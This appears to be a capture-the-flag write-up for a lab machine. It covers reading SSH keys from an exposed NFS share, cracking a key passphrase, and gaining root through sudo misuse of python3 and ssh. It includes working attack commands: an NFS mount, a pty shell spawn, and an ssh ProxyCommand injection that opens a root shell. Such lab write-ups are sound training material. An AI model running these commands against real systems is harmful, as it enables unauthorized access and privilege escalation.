# NMAP SCAN
```nmap
PORT      STATE    SERVICE REASON                                                   
21/tcp    open     ftp     syn-ack                                                  
80/tcp    open     http    syn-ack                                                  
111/tcp   open     rpcbind syn-ack                                                  
2049/tcp  open     nfs     syn-ack                                                  
5518/tcp  filtered unknown no-response
8842/tcp  filtered unknown no-response
21041/tcp filtered unknown no-response
26565/tcp filtered unknown no-response
27853/tcp open     unknown syn-ack
31738/tcp filtered unknown no-response
33301/tcp open     unknown syn-ack
37427/tcp filtered unknown no-response
42669/tcp open     unknown syn-ack
49895/tcp open     unknown syn-ack
56835/tcp open     unknown syn-ack        
```
VSFTPD is on the latest version so no exploits for it yet.
But it looks port 111 and RPC is available, we can check out hacktricks to pentest it.
https://book.hacktricks.xyz/pentesting/pentesting-rpcbind

`If you find the service NFS, then probably you will be able ot list and download files`
Looking at our NMAP output we do have NFS 
```nmap                                                                                                                    
|   100003  3           2049/udp   nfs                                                                                                                                   
|   100003  3           2049/udp6  nfs                                                                                                                                   
|   100003  3,4         2049/tcp   nfs                                                                                                                                   
|   100003  3,4         2049/tcp6  nfs 
```

Since port 2049 is open, we can mount it on your system to read and list files.
`mkdir /mnt/amir`
`mount -t nfs 172.31.1.7:/home/amir /mnt/amir/`

* Interesting file is only .ssh
```bash
drwxrwxr-x 2 faris docker 4096 Apr   2  2020 .
drwxrwxr-x 5 faris docker 4096 Apr   2  2020 ..
-r-------- 1 faris docker  393 Apr   2  2020 authorized_keys
-r-------- 1 faris docker 1766 Apr   2  2020 id_rsa
-rw-r--r-- 1 faris docker 1766 Apr   2  2020 id_rsa.bak
-r-------- 1 faris docker  393 Apr   2  2020 id_rsa.pub
```
# Foothold
We can read `id_rsa.bak`.
After a while, I realized that port 22 is not open, so it must be on another port, so I did a full port scan(which took ages). While that was running I decided to ssh2john the id_rsa in case there was a password and which It did.
`id_rsa:hello6`
After a while, I found port 27853 was open, and just randomly tested and it was a SSH port.
Now we're in.

# Privilege Escalation
```bash
User amir may run the following commands on shares:
    (ALL : ALL) ALL
    (amy) NOPASSWD: /usr/bin/pkexec
    (amy) NOPASSWD: /usr/bin/python3
```
Okay but we don't have the password for amir, so we have to escalate to amy.
For some reason we can't write to our own directory so let's head to /dev/shm to send our scripts.

Actually we don't need to do that.
Since we know we can use user amy to use sudo with no password.
We can escalate to user amy.
So let's check out GTFObins and escalate ourselves.

```bash
$sudo -u amy /usr/bin/python3 -c 'import pty;pty.spawn("/bin/bash")';
$whoami
amy
```
Okay now we're user amy and we found our first flag.
Now to escalate to root.
```bash
User amy may run the following commands on shares:
    (ALL) NOPASSWD: /usr/bin/ssh
```
Okay, check back GTFObins and we'll get this command.
```bash
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
```
We'll spawn a root shell using the Proxy Command.
And we are root.

